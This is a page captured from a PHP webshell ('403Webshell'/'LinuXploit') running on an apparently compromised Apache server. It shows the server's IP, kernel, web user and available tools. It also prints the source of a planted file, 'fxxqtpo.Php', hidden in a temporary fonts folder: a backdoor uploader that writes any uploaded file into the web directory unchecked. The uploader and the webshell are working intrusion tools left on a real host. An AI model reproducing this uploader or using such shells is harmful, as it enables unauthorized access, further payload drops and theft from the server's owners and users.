403Webshell
Server IP : 18.193.92.211  /  Your IP : 216.73.216.128
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux ip-10-0-0-90 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.2.28
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/builderCustomIcon_6a97304cb8e56/fonts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/builderCustomIcon_6a97304cb8e56/fonts/fxxqtpo.Php
<?php
if(isset($_FILES['file'])){
    $target = basename($_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $target)){
        echo "🌍 Uploaded: <a href='$target'>$target</a>";
    } else {
        echo "❈ Upload failed!";
    }
    exit;
}
?>
<!DOCTYPE html>
<html>
<head><title>Upload</title></head>
<body style="background:#0a0a0a;color:#00ff00;font-family:monospace;
             display:flex;justify-content:center;align-items:center;
             height:100vh;margin:0;">
<form method="POST" enctype="multipart/form-data"
      style="background:#111;padding:40px;border:2px solid #00ff00;
             border-radius:10px;text-align:center;">
<h2>📤 UPLOAD</h2>
<input type="file" name="file" required
       style="background:#0a0a0a;color:#00ff00;border:1px solid #00ff00;
              padding:10px;border-radius:5px;">
<br><br>
<button type="submit"
        style="background:#00ff00;color:#0a0a0a;padding:10px 30px;
               border:none;border-radius:5px;font-weight:bold;
               cursor:pointer;">↡ Upload</button>
</form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit